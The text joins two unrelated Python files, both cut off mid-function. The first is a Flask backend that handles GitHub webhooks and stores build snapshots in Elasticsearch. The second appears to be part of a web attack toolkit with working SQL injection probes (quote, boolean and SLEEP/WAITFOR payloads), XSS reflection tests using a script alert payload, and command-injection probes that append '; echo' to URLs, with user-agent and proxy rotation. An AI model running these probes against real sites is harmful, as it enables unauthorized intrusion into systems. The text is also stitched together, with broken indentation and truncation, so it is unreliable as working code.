    # Don't update if we can't validate the requester.
    if request.method == "GET":
        # Manual trigger: only the GitHub user with this numeric id may run it.
        github_response = github.request("GET", "user")
        if github_response["id"] != 52649:
            abort(403)
    elif request.method == "POST":
        # Webhook trigger: constant-time compare of GitHub's signature header.
        h = hmac.new(os.environ['GITHUB_PART_HOOK_HMAC'], request.data, sha1)
        if not hmac.compare_digest(request.headers["X-Hub-Signature"], u"sha1=" + h.hexdigest()):
            abort(403)
    updatePartIndexHelper()
    return 'ok'
@rcbuild.route('/partIndex/by/<by>.json')
def partIndex(by):
    """Serve the small-part index keyed either by category or by part id;
    404 for any other key."""
    indexes = {"category": SMALL_PARTS_BY_CATEGORY,
               "id": SMALL_PARTS_BY_ID}
    if by not in indexes:
        abort(404)
    return Response(json.dumps(indexes[by]),
                    content_type="application/json")
@rcbuild.route('/')
def index():
    """Render the single-page application shell."""
    template = 'main.html'
    return render_template(template)
@rcbuild.route('/update/buildIndex', methods=["GET", "HEAD", "OPTIONS", "POST"])
def updateBuildIndex():
    """Ingest a GitHub push webhook for a user's builds repository and
    update the Elasticsearch 'buildsnapshot' documents accordingly.

    A snapshot is a chain of commits; a new snapshot starts whenever the
    build structure (build.json or cleanflight dumps) changes.

    NOTE(review): only POST carries a webhook payload; `push_info` is
    undefined for other methods -- confirm the intended method set.
    """
    # Don't update if we can't validate the requester.
    if request.method == "POST":
        request_data = request.get_data()
        push_info = json.loads(request_data)
        if "name" not in push_info["repository"]["owner"]:
            print("owner missing name")
            print(push_info["repository"])
            abort(403)
        user = push_info["repository"]["owner"]["name"]
        # The per-user webhook secret lives in the 'private' ES index.
        res = es.get(index='private', doc_type='githubsecret', id=user)
        if not res["found"]:
            print("couldn't find github secret")
            abort(403)
        # Constant-time comparison of GitHub's HMAC-SHA1 payload signature.
        h = hmac.new(str(res["_source"]["secret"]), request.data, sha1)
        if not hmac.compare_digest(request.headers["X-Hub-Signature"], u"sha1=" + h.hexdigest()):
            print("couldn't verify hmac")
            abort(403)
    branch = push_info["ref"][len("refs/heads/"):]
    # Skip the site owner's test branches and any "patch" branches.
    if user == "tannewt" and branch.startswith(("test", "Test")):
        return Response('ok')
    if branch.startswith("patch"):
        return Response('ok')
    # Ignore the push notification we get when a new branch is created.
    if push_info["before"] == "0000000000000000000000000000000000000000" or len(push_info["commits"]) == 0:
        print("Dropping notification of creation of " + push_info["ref"] + " in " + push_info["repository"]["full_name"])
        return Response('ok')
    # Fetch the snapshot that currently ends at the pre-push head commit, if any.
    res = None
    try:
        res = es.get(index='builds', doc_type='buildsnapshot', id=push_info["before"])
    except elasticsearch.TransportError as e:
        print("elastic search error fetching current", e, push_info["before"])
        pass
    current_snapshot = None
    current_doc_id = {"_index": "builds", "_type": "buildsnapshot", "_id": push_info["before"]}
    updating = False
    if res and res["found"]:
        current_snapshot = res["_source"]
        updating = True
    previous_snapshot = None
    previous_doc_id = None
    # We do a bulk update to the index to minimize update cost.
    actions = []
    for commit in push_info["commits"]:
        # We bump the snapshot if settings or parts change but not other things
        # such as flights. Flights will only impact snapshot stats, not structure.
        if (current_snapshot == None or
            ("build.json" in commit["modified"] and
             not commit["message"].startswith(SILENT_COMMIT_MESSAGE)) or
            "cleanflight_cli_dump.txt" in commit["modified"] or
            "cleanflight_gui_backup.txt" in commit["modified"] or
            "cleanflight_cli_dump.txt" in commit["added"] or
            "cleanflight_gui_backup.txt" in commit["added"]):
            # Finalize the previous snapshot.
            if previous_snapshot:
                actions.append({"index": previous_doc_id})
                actions.append(previous_snapshot)
            previous_snapshot = current_snapshot
            previous_doc_id = copy.copy(current_doc_id)
            if previous_snapshot:
                previous_snapshot["next_snapshot"] = commit["id"]
            # Create a new snapshot.
            current_snapshot = {
                "timestamp": commit["timestamp"],
                "user": user,
                "branch": branch,
                "previous_snapshot": previous_doc_id["_id"],
                "commits": [],
                "next_snapshot": None
            }
        elif updating:
            # The id of a snapshot is the last commit so we delete the old current
            # doc when a commit is added and load the previous snapshot so we can
            # update its next.
            actions.append({"delete": copy.copy(current_doc_id)})
            if "previous_snapshot" in current_snapshot:
                previous_doc_id = {"_index": "builds", "_type": "buildsnapshot", "_id": current_snapshot["previous_snapshot"]}
                res = None
                try:
                    res = es.get(index='builds', doc_type='buildsnapshot', id=previous_doc_id["_id"])
                except elasticsearch.TransportError as e:
                    print("elastic search error fetching previous", e, previous_doc_id)
                    pass
                if res and res["found"]:
                    previous_snapshot = res["_source"]
                else:
                    previous_doc_id = None
                if previous_snapshot:
                    previous_snapshot["next_snapshot"] = commit["id"]
        if current_snapshot:
            # Refresh the cached build.json for this commit if it changed.
            if "build" not in current_snapshot or "build.json" in commit["modified"] or "build.json" in commit["added"]:
                r = github.raw_request("GET", "repos/" + user + "/rcbuild.info-builds/contents/build.json?ref=" + commit["id"], headers={"accept": "application/vnd.github.v3.raw"})
                if r.status_code == requests.codes.ok:
                    current_snapshot["build"] = json.loads(r.text)
            # Update to the latest info.
            if "info" not in current_snapshot or "info.json" in commit["modified"] or "info.json" in commit["added"]:
                r = github.raw_request("GET", "repos/" + user + "/rcbuild.info-builds/contents/info.json?ref=" + commit["id"], headers={"accept": "application/vnd.github.v3.raw"})
                if r.status_code == requests.codes.ok:
                    current_snapshot["info"] = json.loads(r.text)
            current_snapshot["commits"].append(commit["id"])
            # Silent upgrades keep the snapshot's original timestamp.
            if not commit["message"].startswith(SILENT_COMMIT_MESSAGE):
                current_snapshot["timestamp"] = commit["timestamp"]
            current_doc_id["_id"] = commit["id"]
        updating = False
    # Flush the final previous/current snapshot pair.
    if previous_snapshot:
        actions.append({"index": previous_doc_id})
        actions.append(previous_snapshot)
    if current_snapshot:
        actions.append({"index": current_doc_id})
        actions.append(current_snapshot)
    es.bulk(index='builds', doc_type='buildsnapshot', body=actions)
    return Response('ok')
def filtered_shoulds(f, shoulds, size=5, sort=None, from_=0):
    """Build an Elasticsearch filtered-query body: filter `f` around a
    bool query of `shoulds`, with paging (`size`, `from_`) and an
    optional `sort` clause (omitted when falsy)."""
    body = {
        "query": {"filtered": {"filter": f,
                               "query": {"bool": {"should": shoulds}}}},
        "size": size,
        "from": from_,
    }
    if sort:
        body["sort"] = sort
    return body
@rcbuild.route('/similar/builds/<user>/<branch>')
def similar_builds(user, branch):
    """Return JSON lists of builds similar to the given user/branch build:
    "others" always, plus "yours" when the viewer is logged in (cookie "u").

    Similarity is an ES bool-should query over the build's part choices,
    boosted per category via partCategories' "similarBoost".
    """
    # Resolve which commit of the build to compare against.
    ref = None
    if "commit" in request.args:
        ref = request.args["commit"]
    else:
        ref = "refs/heads/" + urllib.quote_plus(branch.encode('utf8'))
    build = get_github("repos/" + user + "/rcbuild.info-builds/contents/build.json?ref=" + ref, {"accept": "application/vnd.github.v3.raw"}, use_cache_even_when_logged_in=True)
    if build.status_code != requests.codes.ok:
        return Response(status=requests.codes.server_error)
    build = json.loads(build.get_data(True))
    # Exclude the build we are comparing against from all result sets.
    not_this_build = {"bool": {"must": [{"term": {"user": user}}, {"term": {"branch": branch}}]}}
    shoulds = []
    for category in build["config"]:
        # Single part -> "term"; list of parts -> "terms".
        t = "term"
        term = {category: {"value": build["config"][category]}}
        if isinstance(build["config"][category], list):
            t = "terms"
            term = {category: build["config"][category]}
        if category in partCategories["categories"] and "similarBoost" in partCategories["categories"][category]:
            if t == "term":
                term[category]["boost"] = partCategories["categories"][category]["similarBoost"]
            else:
                term["boost"] = partCategories["categories"][category]["similarBoost"]
        shoulds.append({t: term})
    searches = []
    # Only consider snapshots that are the latest in their chain.
    other_musts = {"missing": {"field": "next_snapshot"}}
    other_size = 10
    if "u" in request.cookies:
        # Logged-in viewer: first search their own builds...
        searches.append({"index": "builds", "doc_type": "buildsnapshot"})
        # NOTE(review): rebinding `f` shadows the module-level Fernet
        # instance inside this function; harmless here but confusing.
        f = {"bool":
             {"must": [{"missing": {"field": "next_snapshot"}},
                       {"term": {"user": request.cookies["u"]}}],
              "must_not" : not_this_build
             }}
        # ...and exclude their builds from the "others" search.
        other_musts = [other_musts,
                       {"not": {"term": {"user": request.cookies["u"]}}}]
        searches.append(filtered_shoulds(f, shoulds))
        other_size = 5
    searches.append({"index": "builds", "doc_type": "buildsnapshot"})
    f = {"bool":
         {"must": other_musts,
          "must_not" : not_this_build
         }}
    searches.append(filtered_shoulds(f, shoulds, size=other_size))
    res = es.msearch(body=searches)
    response = {}
    # Two responses means the viewer's own search ran first.
    if len(res["responses"]) > 1:
        response["yours"] = []
        for hit in res["responses"][0]["hits"]["hits"]:
            hit = hit["_source"]
            response["yours"].append({"user": hit["user"], "branch": hit["branch"]})
    response["others"] = []
    for hit in res["responses"][len(res["responses"]) - 1]["hits"]["hits"]:
        hit = hit["_source"]
        response["others"].append({"user": hit["user"], "branch": hit["branch"]})
    return Response(json.dumps(response))
def get_part(partID):
    """Resolve a "manufacturer/part" id to its small-part dict, following
    symlink aliases in LINKS; return None for malformed or unknown ids."""
    if "/" not in partID:
        return None
    split = partID.rsplit("/", 1)
    manufacturerID = split[0]
    partID = split[1]
    while manufacturerID in LINKS and partID in LINKS[manufacturerID]:
        # BUGFIX: unpack the alias tuple atomically.  The old code updated
        # manufacturerID first and then indexed LINKS with the *new*
        # manufacturer to read the part id, which could KeyError or follow
        # the wrong alias whenever a link crossed manufacturers.
        manufacturerID, partID = LINKS[manufacturerID][partID]
    if manufacturerID in SMALL_PARTS_BY_ID and partID in SMALL_PARTS_BY_ID[manufacturerID]:
        return SMALL_PARTS_BY_ID[manufacturerID][partID]
    return None
def get_part_name(partID):
    """Human-readable "Manufacturer Name" string for a part id, falling
    back to the raw id when the part cannot be resolved."""
    part = get_part(partID)
    if not part:
        return partID
    return part["manufacturer"] + " " + part["name"]
def get_build_snippet(build):
    """Build a share-card snippet for a build: user, branch, the names of
    its key parts, and an optional thumbnail (newest photo, else video).

    A single media entry with an empty imgur/youtube id is treated as a
    placeholder and ignored.
    """
    key_categories = ("frame", "motor", "esc", "fc")
    names = [get_part_name(build["build"]["config"][cat]) for cat in key_categories]
    snippet = {"user" : build["user"],
               "branch" : build["branch"],
               "snippet": u" · ".join([name for name in names if name != ""])}
    if "info" in build and "media" in build["info"]:
        media = build["info"]["media"]
        photos = media["photos"]
        photo_placeholder = len(photos) == 1 and photos[0]["imgur"]["imageId"] == ""
        if len(photos) > 0 and not photo_placeholder:
            snippet["thumb"] = photos[-1]
        else:
            videos = media["videos"]
            video_placeholder = len(videos) == 1 and videos[0]["youtube"]["videoId"] == ""
            if len(videos) > 0 and not video_placeholder:
                snippet["thumb"] = videos[-1]
    return snippet
@rcbuild.route('/list/builds', defaults={"page": 1}, methods=["GET", "HEAD", "OPTIONS", "POST"])
@rcbuild.route('/list/builds/<page>', methods=["GET", "HEAD", "OPTIONS", "POST"])
def list_builds(page):
if request.method != "POST":
return Response(status=requests.codes.method_not_allowed)
partIDs = json.loads(request.data)
shoulds = []
for partID in partIDs:
part = get_part(partID)
categories = part["categories"]
if len(categories) == 0:
categories = partCategories["categories"]
for c in | |
#coding: utf-8
import subprocess,os,xtelnet
import requests,socket,random,time,ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *
from bane.pager import inputs
def sqli_error_based(u,logs=True,user_agent=None,returning=False,timeout=10,proxy=None,cookie=None):
    '''
    Error-based SQL injection probe.

    Appends a single quote to the URL and scans the response body for
    well-known SQL syntax error messages.

    Arguments:
      u : the link to check
      logs : print progress and the verdict (default True)
      returning : when True, return the boolean verdict
      timeout : per-request timeout in seconds (default 10)
      proxy / user_agent / cookie : optional request settings

    usage:
    >>>import bane
    >>>l='http://www.example.com/product.php?id=2'
    >>>bane.sqlieb(domain)
    '''
    vulnerable = False
    if proxy:
        proxy = {'http': 'http://' + proxy}
    headers = {'User-Agent': user_agent if user_agent else random.choice(ua)}
    if cookie:
        headers['Cookie'] = cookie
    if logs == True:
        print("[*]Error Based SQL Injection test")
    # Response-body fragments that betray an unhandled SQL syntax error.
    error_signatures = ('SQL command not properly ended',
                        'Query failed: ERROR: syntax error at or near',
                        'Unclosed quotation mark before the character string',
                        "You have an error in your SQL syntax",
                        "quoted string not properly terminated",
                        "mysql_fetch_array(): supplied argument is not a valid MySQL result resource in")
    try:
        page = requests.get(u + "'", headers=headers, proxies=proxy, timeout=timeout, verify=False).text
        vulnerable = any(signature in page for signature in error_signatures)
    except Exception:
        # Best-effort probe: network failures count as "not vulnerable".
        pass
    if logs == True:
        print("[+]Vulnerable!!!" if vulnerable else "[-]Not vulnerable")
    if returning == True:
        return vulnerable
def sqli_boolean_based(u,logs=True,returning=False,timeout=10,proxy=None,user_agent=None,cookie=None):
    '''
    Boolean-based SQL injection probe.

    Requests the URL twice with contradictory boolean clauses
    (" and 1=2" vs " and 1=1") and reports a hit when both succeed but
    return different bodies (and neither looks like a "not found" page).

    Arguments:
      u : the link to check
      logs : print progress and the verdict (default True)
      returning : when True, return the boolean verdict
      timeout : per-request timeout in seconds (default 10)
      proxy / user_agent / cookie : optional request settings

    usage:
    >>>import bane
    >>>l='http://www.example.com/product.php?id=2'
    >>>bane.sqlibb(domain)
    '''
    if proxy:
        proxy = {'http': 'http://' + proxy}
    vulnerable = False
    headers = {'User-Agent': user_agent if user_agent else random.choice(ua)}
    if cookie:
        headers['Cookie'] = cookie
    try:
        if logs == True:
            print("[*]Boolean Based SQL Injection test")
        false_resp = requests.get(u + " and 1=2", headers=headers, proxies=proxy, timeout=timeout, verify=False)
        true_resp = requests.get(u + " and 1=1", headers=headers, proxies=proxy, timeout=timeout, verify=False)
        false_body = false_resp.text
        true_body = true_resp.text
        if false_resp.status_code == 200 and true_resp.status_code == 200:
            if (false_body != true_body and
                    "not found" not in false_body.lower() and
                    "not found" not in true_body.lower()):
                vulnerable = True
    except:
        # Best-effort probe: any failure counts as "not vulnerable".
        pass
    if logs == True:
        print("[+]Vulnerable!!!" if vulnerable else "[-]Not vulnerable")
    if returning == True:
        return vulnerable
def sqli_time_based(u,delay=15,db="mysql",logs=True,returning=False,timeout=25,proxy=None,user_agent=None,cookie=None):
    '''
    Time-based SQL injection probe.

    Appends a database-specific sleep payload to the URL and reports a
    hit when the response takes at least `delay` seconds and returns 200.

    Arguments:
      u : the link to check
      delay : seconds the database is asked to sleep
      db : target flavor, one of "mysql", "sql" (MSSQL) or "oracle";
           any other value returns None immediately
      logs : print progress and the verdict (default True)
      returning : when True, return the boolean verdict
      timeout : per-request timeout in seconds (default 25)
      proxy / user_agent / cookie : optional request settings

    usage:
    >>>import bane
    >>>l='http://www.example.com/product.php?id=2'
    >>>bane.sqlitb(domain)
    '''
    if proxy:
        proxy={'http':'http://'+proxy}
    if user_agent:
        us=user_agent
    else:
        us=random.choice(ua)
    if cookie:
        hea={'User-Agent': us,'Cookie':cookie}
    else:
        hea={'User-Agent': us}
    s=False
    # BUGFIX: these used to be three independent `if` statements, so the
    # trailing `else: return None` was bound only to the "oracle" check --
    # any db other than "oracle" bailed out with None even after its
    # payload had been selected.  An if/elif chain picks exactly one.
    if db.lower()=="mysql":
        sle="-SLEEP({})".format(delay)
    elif db.lower()=="sql":
        sle="; WAIT FOR DELAY '00:00:{}'".format(delay)
    elif db.lower()=="oracle":
        sle="BEGIN DBMS_LOCK.SLEEP({}); END;".format(delay)
    else:
        return None
    try:
        if logs==True:
            print("[*]Time Based SQL Injection test")
        t=time.time()
        r=requests.get(u+sle,headers=hea,proxies=proxy,timeout=timeout, verify=False)
        # Vulnerable when the server actually slept for the requested delay.
        if ((time.time()-t>=delay)and (r.status_code==200)):
            s=True
    except:
        # Best-effort probe: any failure counts as "not vulnerable".
        pass
    if logs==True:
        if s==False:
            print("[-]Not vulnerable")
        if s==True:
            print("[+]Vulnerable!!!")
    if returning==True:
        return s
def xss_get(u,pl,user_agent=None,extra=None,timeout=10,proxy=None,cookie=None):
    '''
    XSS reflection test using a GET request.

    Arguments:
      u : link to test
      pl : dict of {parameter: xss payload}
      extra : optional additional request parameters as {param: value}
      timeout : per-request timeout in seconds (default 10)
      user_agent / proxy / cookie : optional request settings

    Returns True when the payload is reflected in the response body.
    '''
    if user_agent:
        us=user_agent
    else:
        us=random.choice(ua)
    if cookie:
        hea={'User-Agent': us,'Cookie':cookie}
    else:
        hea={'User-Agent': us}
    if proxy:
        proxy={'http':'http://'+proxy}
    # NOTE: with multiple payload entries only the last key's payload is
    # checked for reflection (kept for parity with xss_post).
    for x in pl:
        xp=pl[x]
    d={}
    if extra:
        d.update(extra)
    d.update(pl)
    try:
        # BUGFIX: send the merged dict `d` (payload + extra params); the
        # old code built `d` and then passed `pl`, silently dropping
        # `extra` -- inconsistent with xss_post, which sends `d`.
        c=requests.get(u, params= d,headers = hea,proxies=proxy,timeout=timeout, verify=False).text
        if xp in c:
            return True
    except Exception as e:
        pass
    return False
def xss_post(u,pl,user_agent=None,extra=None,timeout=10,proxy=None,cookie=None):
    '''
    XSS reflection test using a POST request.

    Arguments:
      u : link to test
      pl : dict of {parameter: xss payload}
      extra : optional additional form fields as {param: value}
      timeout : per-request timeout in seconds (default 10)
      user_agent / proxy / cookie : optional request settings

    Returns True when the payload is reflected in the response body.
    '''
    headers = {'User-Agent': user_agent if user_agent else random.choice(ua)}
    if cookie:
        headers['Cookie'] = cookie
    if proxy:
        proxy = {'http': 'http://' + proxy}
    # With multiple payload entries only the last key's payload is checked.
    payload = None
    for key in pl:
        payload = pl[key]
    form = {}
    if extra:
        form.update(extra)
    form.update(pl)
    try:
        body = requests.post(u, data=form, headers=headers, proxies=proxy, timeout=timeout, verify=False).text
        if payload in body:
            return True
    except Exception:
        pass
    return False
def xss(u,payload=None,fresh=False,get=True,post=True,logs=True,returning=False,proxy=None,proxies=None,timeout=10,user_agent=None,cookie=None):
    '''
    XSS test using both POST and GET requests.  Extracts the page's input
    field names with the "inputs" helper, then tests each empty-valued
    input with the payload while sending pre-filled inputs as extras.

    Arguments:
      u : link to test
      payload : xss payload; None uses the default alert() payload
      fresh : re-fetch the input list (with a fresh User-Agent) before
              each GET/POST attempt
      get / post : enable testing via GET / POST (both default True)
      logs : print progress (default True)
      returning : when True, return the per-parameter result strings
      proxy / proxies : a single proxy, or a list to rotate per request
      timeout / user_agent / cookie : request settings

    The module-level `stop` flag aborts the scan when set externally.

    usage:
    >>>import bane
    >>>bane.xss('http://www.example.com/")
    >>>bane.xss('http://www.example.com/',payload="<script>alert(123);</script>")
    '''
    global stop
    stop=False
    if proxy:
        proxy=proxy
    if proxies:
        proxy=random.choice(proxies)
    lst=[]
    if payload:
        xp=payload
    else:
        xp='<script>alert("Vulnerable!!!");</script>'
    if logs==True:
        print("Getting parameters...")
    hu=True
    # inputs() yields "name:value" strings for each form field.
    l1=inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent)
    if len(l1)==0:
        if logs==True:
            print("No parameters were found!!!")
        hu=False
    if hu==True:
        # Split fields into pre-filled extras (extr) and empty test targets (l).
        extr=[]
        l=[]
        for x in l1:
            if (x.split(':')[1]!=''):
                extr.append(x)
            else:
                l.append(x)
        # NOTE(review): removing from `extr` while iterating it can skip
        # elements -- confirm intended.
        for x in extr:
            if x.split(':')[0] in l:
                extr.remove(x)
        if logs==True:
            print("Test has started...\nPayload:\n"+xp)
        # Drop any query string; payloads are sent as parameters instead.
        if '?' in u:
            u=u.split('?')[0].split(',')[0]
        for i in l:
            if stop==True:
                break
            user=None
            i=i.split(':')[0]
            try:
                # Rotate proxy per parameter when a pool was supplied.
                if proxies:
                    proxy=random.choice(proxies)
                pl={i : xp}
                extra={}
                if len(extr)!=0:
                    for x in extr:
                        a=x.split(':')[0]
                        b=x.split(':')[1]
                        extra.update({a:b})
                if get==True:
                    if fresh==True:
                        if stop==True:
                            break
                        # Re-discover the form fields with a fresh User-Agent.
                        extr=[]
                        user=random.choice(ua)
                        k=inputs(u,user_agent=user,proxy=proxy,timeout=timeout,value=True,cookie=cookie)
                        for x in k:
                            if (x.split(':')[1]!=''):
                                extr.append(x)
                        for x in extr:
                            if x.split(':')[0] in l:
                                extr.remove(x)
                        extra={}
                        if len(extr)!=0:
                            for x in extr:
                                a=x.split(':')[0]
                                b=x.split(':')[1]
                                extra.update({a:b})
                    if stop==True:
                        break
                    if xss_get(u,pl,user_agent=user,extra=extra,proxy=proxy,timeout=timeout,cookie=cookie)==True:
                        x="parameter: "+i+" method: GET=> [+]Payload was found"
                    else:
                        x="parameter: "+i+" method: GET=> [-]Payload was not found"
                    lst.append(x)
                    if logs==True:
                        print (x)
                if post==True:
                    if fresh==True:
                        if stop==True:
                            break
                        # Re-discover the form fields with a fresh User-Agent.
                        extr=[]
                        user=random.choice(ua)
                        k=inputs(u,user_agent=user,proxy=proxy,timeout=timeout,value=True,cookie=cookie)
                        for x in k:
                            if (x.split(':')[1]!=''):
                                extr.append(x)
                        for x in extr:
                            if x.split(':')[0] in l:
                                extr.remove(x)
                        extra={}
                        if len(extr)!=0:
                            for x in extr:
                                a=x.split(':')[0]
                                b=x.split(':')[1]
                                extra.update({a:b})
                    if stop==True:
                        break
                    if xss_post(u,pl,user_agent=user,extra=extra,proxy=proxy,timeout=timeout,cookie=cookie)==True:
                        x="parameter: "+i+" method: POST=> [+]Payload was found"
                    else:
                        x="parameter: "+i+" method: POST=> [-]Payload was not found"
                    lst.append(x)
                    if logs==True:
                        print (x)
            except:
                # Any unexpected failure aborts the remaining parameters.
                break
    if returning==True:
        return lst
def command_exec_link(u,timeout=10,proxy=None,logs=True,returning=False,user_agent=None,cookie=None):
    '''
    OS command execution test for a given link: appends an echo marker
    to the URL and reports a hit when the marker appears in a 200
    response body.
    '''
    vulnerable = False
    if proxy:
        proxy = {'http': 'http://' + proxy}
    headers = {'User-Agent': user_agent if user_agent else random.choice(ua)}
    if cookie:
        headers['Cookie'] = cookie
    probe = u + '; echo alaistestingyoursystem'
    try:
        r = requests.get(probe, headers=headers, proxies=proxy, timeout=timeout, verify=False)
        if r.status_code == 200 and "alaistestingyoursystem" in r.text:
            vulnerable = True
    except:
        # Best-effort probe: any failure counts as "not vulnerable".
        pass
    if logs == True:
        if vulnerable == True:
            print("[+]Vulnerable!!!")
        else:
            print("[-]Not vulnerable")
    if returning == True:
        return vulnerable
def command_exec_get(u,param='',value='',extra=None,timeout=10,proxy=None,user_agent=None,cookie=None):
'''
this function is for command execution test using a given link and GET parameter
'''
value+=";echo alaistestingyoursystem"
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
pl={param:value}
if extra:
pl.update(extra)
try:
r=requests.get(u,params=pl,headers = hea,proxies=proxy,timeout=timeout, verify=False)
if |
# Trailing non-code text (dataset-site boilerplate), commented out so the
# file remains parseable:
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.